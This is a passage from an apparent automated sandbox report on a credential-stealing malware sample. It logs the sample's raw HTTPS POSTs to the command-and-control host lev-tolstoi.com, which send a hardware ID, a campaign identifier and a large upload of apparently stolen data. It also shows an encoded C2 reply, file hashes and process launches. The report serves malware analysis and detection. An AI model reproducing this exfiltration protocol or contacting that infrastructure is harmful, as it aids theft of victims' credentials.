cfL4;desc="?proto=TCP&rtt=1603&min_rtt=1603&rtt_var=602&sent=15&recv=24&lost=0&retrans=0&sent_bytes=2834&recv_bytes=21464&delivery_rate=1815920&cwnd=243&unsent_bytes=0&cid=ba96cde6c55dcfd5&ts=980&x=0"
2024-12-26 12:01:42 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 12:01:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49718	104.21.66.86	443	4296	C:\Users\user\Desktop\z3IxCpcpg4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 12:01:44 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=YD373N7N45EY8C56U User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1247 Host: lev-tolstoi.com
2024-12-26 12:01:44 UTC	1247	OUT	Data Raw: 2d 2d 59 44 33 37 33 4e 37 4e 34 35 45 59 38 43 35 36 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 35 46 41 44 41 43 33 45 31 45 43 43 37 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 59 44 33 37 33 4e 37 4e 34 35 45 59 38 43 35 36 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 44 33 37 33 4e 37 4e 34 35 45 59 38 43 35 36 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 Data Ascii: --YD373N7N45EY8C56UContent-Disposition: form-data; name="hwid"275FADAC3E1ECC72BEBA0C6A975F1733--YD373N7N45EY8C56UContent-Disposition: form-data; name="pid"1--YD373N7N45EY8C56UContent-Disposition: form-data; name="lid"LOGS11--LiveTraf
2024-12-26 12:01:45 UTC	1126	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 12:01:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8jo8aacp129uekhpiqlvnlu2br; expires=Mon, 21 Apr 2025 05:48:24 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n3gkk%2FyrXYCM4t46dPUtxh1c464Mmxm8dGhAh7WqZmVttjVG0UaFRAelvBKiW2ke3coecOv5gnyfP9biG%2BulBq%2FHkgFQaGMH9bCE%2Bb12r78dhhW4wUDgI1ziFuUTzoc0W8Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80eafe6b72440e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2297&min_rtt=2287&rtt_var=879&sent=8&recv=9&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2162&delivery_rate=1230509&cwnd=236&unsent_bytes=0&cid=aa00b8082760a6d6&ts=924&x=0"
2024-12-26 12:01:45 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-26 12:01:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49725	104.21.66.86	443	4296	C:\Users\user\Desktop\z3IxCpcpg4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 12:01:47 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=XXR23ITXKCAPGB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 626656 Host: lev-tolstoi.com
2024-12-26 12:01:47 UTC	15331	OUT	Data Raw: 2d 2d 58 58 52 32 33 49 54 58 4b 43 41 50 47 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 35 46 41 44 41 43 33 45 31 45 43 43 37 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 58 58 52 32 33 49 54 58 4b 43 41 50 47 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 58 52 32 33 49 54 58 4b 43 41 50 47 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 58 58 Data Ascii: --XXR23ITXKCAPGBContent-Disposition: form-data; name="hwid"275FADAC3E1ECC72BEBA0C6A975F1733--XXR23ITXKCAPGBContent-Disposition: form-data; name="pid"1--XXR23ITXKCAPGBContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--XX
2024-12-26 12:01:47 UTC	15331	OUT	Data Raw: ab 1c 2c 14 08 ba c8 99 55 8e 38 01 4a 7b 1c b8 77 ad 37 1b 3e 26 a1 35 51 83 13 61 d9 a7 a0 ef fc 73 3d 3d 39 c0 dc b9 1c 41 1e 50 33 99 d7 9e 30 35 26 8a 70 26 12 74 5a 82 21 8e fe ad 1c ac b9 0b f2 fd f1 db 8c a0 49 e9 54 2b 54 cf 6e 4a 43 83 d0 b8 dc 5d d3 dc 9c 9f 92 0f 64 17 49 fe 94 1d f0 b3 ef 4d 0e e8 31 8a f0 90 2c 6a d4 e5 de 74 b7 14 cb 7c 57 40 b1 ee 55 b6 0f 75 a7 7f 38 ba bb 3a ab 00 9c b8 95 cf 1b f6 8d e5 f0 e1 33 04 65 8e db f5 5d e1 af 91 af 51 cd 39 37 54 4e bb ab 12 1b a1 cb 8d 14 5e f8 5c d0 af 17 7b b4 50 51 fc 65 3b bb d1 3d 21 96 73 ab 32 e3 e8 81 22 2a 8e 46 a1 e2 f0 b7 c1 66 e1 f6 3c e0 ee a2 f2 a4 6c 96 dc eb e0 3e c5 5c be c6 55 f7 85 05 37 37 a4 cc f3 4a 26 95 6f e9 50 30 0a 11 17 58 cf d2 96 d4 86 63 ef 2a 81 8e d3 4c 69 5a Data Ascii: ,U8J{w7>&5Qas==9AP305&p&tZ!IT+TnJC]dIM1,jt\|W@Uu8:3e]Q97TN^\{PQe;=!s2"Ff<l>\U77J&oP0XcLiZ
2024-12-26 12:01:47 UTC	15331	OUT	Data Raw: 5c e8 c0 21 9c 36 2d 69 59 4f 9b 81 e2 28 2e e0 27 7a fc 4e 30 d0 1e 3f 32 b4 18 4a ad e0 11 63 b3 43 44 07 fc f1 f0 29 1e 6f 4f dc a4 94 73 bd 08 42 60 61 cd ce 40 36 b3 0c 98 4b 47 2d 1c 8f ff 26 f1 ba 57 e9 de 25 62 c7 5a 8e 2a 43 73 11 93 58 67 7e fc 6f 98 3e ec 5c be b3 d2 40 29 40 cc 82 e8 e1 99 17 9c e0 b7 df 4f a9 fa c1 76 89 a8 dd 4b 74 be c5 cd 12 1f f8 fc ba c5 50 eb f5 c8 e8 95 fa 2b ea 99 ca 3e 58 a3 57 d5 e8 59 00 b8 76 bc cc d2 1f a8 d0 b2 d8 1e 44 68 a0 91 74 a4 bb 58 f9 93 1b 75 a2 ad 54 be 4d c0 c7 ce 33 26 60 7a cd 68 91 33 44 42 b1 db 3f 76 c9 41 9e 04 6e 3a 0a cc af c6 a5 e7 39 17 c1 c0 fb f3 7e 9a 60 63 b3 6f 27 e8 f7 c3 b0 7e 90 f5 5e 8a a3 1c a2 dc d3 65 6e 3f e5 02 93 3b dc cb f5 23 5f 47 49 cb e9 2f 74 01 23 48 3c ea c1 6a 03 e7 Data Ascii: \!6-iYO(.'zN0?2JcCD)oOsB`a@6KG-&W%bZ*CsXg~o>\@)@OvKtP+>XWYvDhtXuTM3&`zh3DB?vAn:9~`co'~^en?;#_GI/t#H<j
2024-12-26 12:01:47 UTC	15331	OUT	Data Raw: 68 3a 24 0d 66 e1 a7 4c 1b 47 47 16 23 74 91 c0 73 cf 8c 22 5e 21 ef 07 5a d8 3f 5b 8b fd a0 04 ad ba 51 24 76 2b f5 f3 ba 55 5a 48 a1 c5 a3 6e e5 7b df 0d bc 43 9d 84 05 a1 f3 90 61 cf 78 a5 84 42 0b cd ad 7a 65 0b 7f 34 26 c6 75 b4 79 46 fc 91 89 14 b9 b7 6c f9 cf 50 93 3d 94 b6 c0 3d 1b 94 97 c7 cb 9b 37 59 c5 d1 6e 8a f7 24 3a 14 8e 5d 6a ad f0 c0 d2 65 e9 23 62 a2 95 26 ad 07 6a 77 5a 5a c7 77 a3 cc 07 a9 37 c6 ff 93 e8 50 4f 99 d8 0d d0 b4 ed 67 96 7e 4d 1e 11 8a 30 b4 66 d5 27 34 68 d0 c6 8b 20 1b f1 a4 52 76 51 47 e8 b1 38 24 cd 17 91 da 5c db 9b 44 f3 8b 5a e2 7e dd 83 0c 24 be 22 9f 15 1d 0d d5 2a 53 7f b9 53 df 75 a8 d7 fe fd 06 dc 83 b2 58 b4 22 c4 15 f2 a0 f3 64 e8 bc d6 76 52 3b 6b 84 71 73 f8 1f 6f 23 ce e0 aa 4f b5 f7 63 55 76 ab 1f c7 cb Data Ascii: h:$fLGG#ts"^!Z?[Q$v+UZHn{CaxBze4&uyFlP==7Yn$:]je#b&jwZZw7POg~M0f'4h RvQG8$\DZ~$"*SSuX"dvR;kqso#OcUv
2024-12-26 12:01:47 UTC	15331	OUT	Data Raw: 18 e4 79 6b bc 7f 6f d2 93 db 5e fc bf 4a 85 2d f4 1d 60 53 43 bd b7 c7 53 c9 a2 f5 21 50 93 7a dc 83 9f 52 52 53 b7 aa c9 41 ba a8 4e 95 e1 ae 26 27 8b 19 30 71 3d 25 6c 47 31 9c 3f b5 bf 68 0a 96 18 e6 e7 e9 51 de a7 2b 3f 6b 81 0a f3 b1 2f ac 27 78 15 e6 da 7a 40 87 2b 95 fa 5d ca 23 0e 4a dd ef 92 59 d3 3b ab 19 e5 e7 5e 3c 63 28 0a e1 d4 08 bf 39 7a b9 ab d4 21 dc 70 68 f4 33 a0 19 3b 9b 64 84 9c 33 51 8a f7 46 40 fb 21 d2 8f 70 79 25 c3 66 0e 8f 7d 3b 32 25 ff 9e 65 be 2f 4a 58 b9 98 a5 f4 9e 81 83 e2 c3 71 55 49 13 35 7c 65 69 05 08 33 f4 82 2a 99 78 75 13 dc 82 a6 b8 74 cc 23 4c 39 f7 b2 37 cc 74 f2 a1 3f 4e 17 2e f7 a6 de 1d 50 af ce 70 7d 8c 9c 88 a7 20 d4 cf 63 7c 07 74 1a d0 2d ea 28 7f a1 f9 1e 4b 0e 0e d4 52 a4 74 df 81 15 03 9a ee 36 f3 79 Data Ascii: yko^J-`SCS!PzRRSAN&'0q=%lG1?hQ+?k/'xz@+]#JY;^<c(9z!ph3;d3QF@!py%f};2%e/JXqUI5\|ei3*xut#L97t?N.Pp} c\|t-(KRt6y
2024-12-26 12:01:47 UTC	15331	OUT	Data Raw: 3e ce 8f c3 8d 5b ee 99 70 5c b1 90 0d 31 10 93 81 fc 79 10 a2 88 5b 8e 79 27 82 3d 1e 16 41 01 91 74 c3 e8 3b 05 2c d7 40 4d 31 a8 f8 2c d5 b2 07 33 2f 7a 14 85 b1 70 d0 60 98 0d cb 43 a9 71 d0 29 a4 1a 7d 68 27 c3 c9 c4 02 ef 60 2f 04 6a 67 08 de 2b ad 1d e3 af 42 d4 41 66 2b c9 00 99 2f 73 4c 89 56 dc 68 a1 20 6f 1b 52 3c 69 e1 84 aa 03 0a 74 19 a2 ac 35 ac cd 10 34 37 77 b0 e7 9b f1 cf 48 0d a3 e0 42 f0 0a 0a 90 a2 0d 6c b0 5f e6 fe 52 6f b5 a0 f4 f2 5f 75 29 c1 ba 47 31 d5 1a 3c 32 07 98 7b 5d d9 ef f8 12 a3 1b 37 0a 1a 69 77 39 03 c8 79 23 b2 09 d3 de ad ca a0 5f 49 a6 88 fd 1e 96 1b 29 04 37 13 37 4c ba 64 95 8a 3b 0f 49 b8 6c 5d 92 e8 e2 13 ee dd ba 62 74 d5 b1 ae bc de 8a 72 48 62 62 e8 fa 48 a5 18 42 18 f7 51 d7 dc 36 4c 47 dd bc f9 43 93 12 2d Data Ascii: >[p\1y[y'=At;,@M1,3/zp`Cq)}h'`/jg+BAf+/sLVh oR<it547wHBl_Ro_u)G1<2{]7iw9y#_I)77Ld;Il]btrHbbHBQ6LGC-
2024-12-26 12:01:47 UTC	15331	OUT	Data Raw: 85 bc 07 8a 31 d6 70 d7 9e 5d 8a 6b da 3a 3c 92 87 76 e3 ff b0 0c ee b3 ee bc c6 cf 6f 58 2e 8e df 5e 6c 89 e3 0c 1d c8 0d 25 b1 38 24 02 ea 80 bd 3a bf f0 3f bc 57 b2 8d c3 70 2d 44 6f 23 50 b5 41 c7 c2 3d 72 9a 8b cf 4b 1d de 0f 91 1e 6d cd 47 7c 38 3b c7 fc fb ea 71 d7 b8 bc ec 55 da 6d 15 9d 83 fe 01 f9 08 da 85 29 b0 e0 80 a0 fd df a3 7f f6 67 58 7f ee 69 d6 1f 01 17 f3 32 3e d1 8a 57 2d 92 43 95 d1 f7 21 5a f7 56 f4 91 cb 10 fd df 29 fc ce 1c 6b 71 a9 20 0b 34 86 fe f2 cf df 2f 97 77 a5 94 ae dc 37 5a 37 99 3d bc 6c c5 ee 7f b6 6c f7 eb d3 50 e1 7a 8c 16 08 f4 bd b4 f4 1a 09 8b db 79 9d 5b 9e 98 c3 7f 80 80 14 ae 9b 8e 10 29 42 80 8a 69 55 cf ad 56 c8 52 6c 7c f6 3d ba 04 c1 b0 7f 7f d9 70 90 14 42 4d 43 c0 8d 4a b5 bf d2 6f 89 f1 bb 73 8b fd 3b 8e Data Ascii: 1p]k:<voX.^l%8$:?Wp-Do#PA=rKmG\|8;qUm)gXi2>W-C!ZV)kq 4/w7Z7=llPzy[)BiUVRl\|=pBMCJos;
2024-12-26 12:01:47 UTC	15331	OUT	Data Raw: fa 43 63 4e 82 9d 5b a6 cd 3d 49 be 16 2e f6 c8 a1 bf 3e b8 94 eb c2 96 f8 c0 36 d1 04 98 a7 57 3d 54 dc f1 06 3a bd 34 bd 54 e0 ad 44 d4 2a cf 18 5e 2b 28 60 bf 1c ad 42 79 4c 35 b8 f8 0a c6 1a 19 11 78 81 b7 fd 7a cf ec 1d d2 93 2d d5 c0 ba 12 3b 34 50 65 3d 62 29 bb f3 d0 62 dc 6b 30 72 77 0b fd 34 89 0e 93 ea cd 5b 76 37 73 2b 31 8c 85 9c f3 32 ba d5 7a 41 82 83 31 cd 87 64 40 de 7c 16 75 3f 44 db 14 8a cb 3e 0f f2 86 32 ad 35 e9 e6 9c 6c 0f 43 7a b6 9c 2b 0d 32 cf d1 59 b5 49 c4 62 a4 e0 99 53 d6 3f 9b 10 85 8a eb d2 40 4b 04 98 62 2d 69 44 24 28 e2 b6 74 ac b2 d9 d3 8e 9c b8 f0 dd 24 12 ef 58 3d 80 a0 21 10 2f b5 61 2f a4 11 cf f6 c7 37 35 52 a2 1c 9f 6c 84 2b 86 c4 f3 49 47 96 cf 52 52 61 1f 65 90 7f 6e f0 22 64 9a 95 99 27 16 82 13 5b 72 41 7f 13 Data Ascii: CcN[=I.>6W=T:4TD*^+(`ByL5xz-;4Pe=b)bk0rw4[v7s+12zA1d@\|u?D>25lCz+2YIbS?@Kb-iD$(t$X=!/a/75Rl+IGRRaen"d'[rA
2024-12-26 12:01:47 UTC	15331	OUT	Data Raw: 63 5d 5a 15 6a 74 d8 53 78 e8 59 0e b2 f9 0c 1c fd 5f ce 54 e5 7b bf 81 9f b9 2e e9 52 08 e0 8e 41 ad 6c ed cd 48 c7 44 74 33 c7 7c 86 ec 3a df d5 5d 82 d6 c0 62 5b df 71 2c f6 2d 66 c1 e1 77 59 e8 6d 4f e3 4c 21 df 87 7f 04 0c 6c e1 43 05 98 39 15 e3 9a ff f4 f6 40 d5 86 61 fc b3 9f ff 2c f5 b9 3d 5a 0f b1 ce 6d bd b7 b9 fa d2 4e 4b 2e 5b 74 16 f9 f2 f5 95 f4 bf 5b 2f 23 a4 12 8f c8 5e a8 d9 1e 52 85 16 82 a7 60 58 70 33 da 27 7b 82 93 70 a0 c7 e4 e8 83 a5 ad 63 35 ba 1d 57 4e c3 7e 30 75 cc 28 19 49 12 be c1 90 9c 72 08 dc 65 e7 a3 56 7f c7 76 af 91 ed db c8 60 53 75 8e 9c 59 6e 45 8d 77 9a a0 1b cf 09 32 2e 7c 9c 0a 05 fa 77 b7 ae 7c 5c fd fe e5 b7 e3 e0 20 ef d6 35 62 27 80 75 92 03 d0 d6 e6 a1 c3 1d b3 68 86 f9 90 e4 dc 9d 59 da 10 80 79 d6 7b ae 53 Data Ascii: c]ZjtSxY_T{.RAlHDt3\|:]b[q,-fwYmOL!lC9@a,=ZmNK.[t[/#^R`Xp3'{pc5WN~0u(IreVv`SuYnEw2.\|w\|\ 5b'uhYy{S
2024-12-26 12:01:47 UTC	15331	OUT	Data Raw: 41 1e 0f f3 a3 2a 78 0b 9f 86 c8 3c 88 8b 10 bd 4c 87 fd 5e 3a 92 43 1b fc 67 ab 3d 21 42 94 0f 20 c9 5e 88 f6 c9 33 05 d8 b6 ac 04 7a bd 3b dd dc 4e f4 25 3d b1 f8 bc c0 82 2c 37 81 d2 27 26 c7 ab 20 ac 24 ae 24 ed 4e a2 99 f7 20 48 7e 8b 82 1d d1 ba f0 fe 43 49 68 79 55 de 76 71 af 6f ff 4e 28 3e 1b 15 7c 49 f8 07 0f d8 af 77 c2 15 db 29 17 2e 97 49 4f 45 c7 06 73 ca 29 5d b6 9f 0a 02 53 d1 d6 9e 5c 2d 6b 88 f1 e8 94 3c ba 61 7f 93 e1 25 f5 9a 31 6e fc d6 5a 29 0d c5 22 64 0f a5 cc 04 05 40 9b ca 76 3b 16 a1 4d 48 c0 3b 3e 38 08 05 a2 14 2d e5 33 d2 04 2d ae 9f b1 28 55 7d b5 8f c6 91 08 25 9b 60 91 d0 b2 f2 b3 31 d7 0f 73 43 3f cf c4 a8 c6 c4 c4 4c 4a 44 40 bd 06 bb ba 18 14 ae bb ac d8 55 ab dd 52 7a ca 12 2b c8 9c 90 5c 1d 12 1f d8 93 ef e8 01 75 b8 Data Ascii: A*x<L^:Cg=!B ^3z;N%=,7'& $$N H~CIhyUvqoN(>\|Iw).IOEs)]S\-k<a%1nZ)"d@v;MH;>8-3-(U}%`1sC?LJD@URz+\u
2024-12-26 12:01:51 UTC	1129	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 12:01:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1kqq0gvhn2ql7alkbpe2q8io5o; expires=Mon, 21 Apr 2025 05:48:28 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ju6rrhwfA2YSOzC9fCW%2B03OAMPKYq7AshbDv61qyyUO2x%2BqH2NTCkbKj5WfjzK1TKlE3gUeRxzAs0gXwlLIbEpSXsc4UHI5iqS00FBduVL4ZZb3ZZnLT7ulsjaMJkv6h31c%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80eb107dcfde93-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1489&min_rtt=1486&rtt_var=564&sent=400&recv=650&lost=0&retrans=0&sent_bytes=2835&recv_bytes=629352&delivery_rate=1927392&cwnd=248&unsent_bytes=0&cid=b4f57f1400aecf6a&ts=3769&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49737	104.21.66.86	443	4296	C:\Users\user\Desktop\z3IxCpcpg4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 12:01:52 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 88 Host: lev-tolstoi.com
2024-12-26 12:01:52 UTC	88	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 32 37 35 46 41 44 41 43 33 45 31 45 43 43 37 32 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=275FADAC3E1ECC72BEBA0C6A975F1733
2024-12-26 12:01:53 UTC	1121	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 12:01:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lb6ei4gsh5frm6nln9kdqquhgr; expires=Mon, 21 Apr 2025 05:48:31 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v8iZM4Eq3IqQk%2FmkeYA8eQSqWPrpF2Mo2GeHmVSRykHLJ5CG90Ts1b2hLwAJKkpUijPGAKodVMu0XpAbayYhl5sd4aGbtZ0D3H8gvuXhUAbwnXekdqqdcQhEl%2FITNasIijg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80eb308fe8c45c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1535&min_rtt=1535&rtt_var=577&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=987&delivery_rate=1893644&cwnd=243&unsent_bytes=0&cid=9d5e3788e7eb1f33&ts=814&x=0"
2024-12-26 12:01:53 UTC	210	IN	Data Raw: 63 63 0d 0a 2f 47 65 54 45 45 6b 35 49 31 59 79 4d 4a 41 67 6f 50 76 6b 58 38 2b 55 45 43 64 78 50 45 73 47 44 42 67 4d 4e 5a 72 48 4b 33 53 6e 48 4c 46 6c 61 77 4d 42 50 6b 5a 45 34 42 72 38 31 4c 68 77 2f 71 77 6c 43 55 4d 4e 66 69 67 39 4b 54 38 62 71 2f 46 33 57 35 4d 42 39 55 78 6d 58 55 59 77 48 46 58 6f 52 59 4c 58 78 6a 6d 37 74 69 6f 58 58 52 34 75 4a 44 59 70 63 52 6e 68 35 56 35 57 78 6b 58 37 5a 44 31 4a 47 51 6f 64 62 4c 38 52 6d 4d 37 4b 62 66 36 68 50 68 5a 41 44 32 55 33 4f 6b 51 6a 57 76 79 68 64 31 75 59 41 76 55 2b 4c 45 46 47 64 42 34 53 39 6c 53 43 77 64 52 7a 37 66 45 79 48 55 46 42 46 67 3d 3d 0d 0a Data Ascii: cc/GeTEEk5I1YyMJAgoPvkX8+UECdxPEsGDBgMNZrHK3SnHLFlawMBPkZE4Br81Lhw/qwlCUMNfig9KT8bq/F3W5MB9UxmXUYwHFXoRYLXxjm7tioXXR4uJDYpcRnh5V5WxkX7ZD1JGQodbL8RmM7Kbf6hPhZAD2U3OkQjWvyhd1uYAvU+LEFGdB4S9lSCwdRz7fEyHUFBFg==
2024-12-26 12:01:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	07:01:22
Start date:	26/12/2024
Path:	C:\Users\user\Desktop\z3IxCpcpg4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\z3IxCpcpg4.exe"
Imagebase:	0xf00000
File size:	2'926'592 bytes
MD5 hash:	764B683CAC60E423FF3659606D250CB4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2293346349.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:02:03
Start date:	26/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=z3IxCpcpg4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	07:02:05
Start date:	26/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2572 --field-trial-handle=2272,i,1615752867562704235,17877190940150072882,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	07:02:08
Start date:	26/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=z3IxCpcpg4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	07:02:08
Start date:	26/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1160 --field-trial-handle=2012,i,15433138936356664886,13501548985382534972,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	80.4%
Total number of Nodes:	504
Total number of Limit Nodes:	52

Executed Functions

Function 00F12750 Relevance: 268.0, APIs: 3, Strings: 149, Instructions: 2041COMMON

Download Yara Rule

Strings

\, xrefs: 00F13614
1, xrefs: 00F13FD1
a, xrefs: 00F13D12
, xrefs: 00F13C6A
h, xrefs: 00F12F68
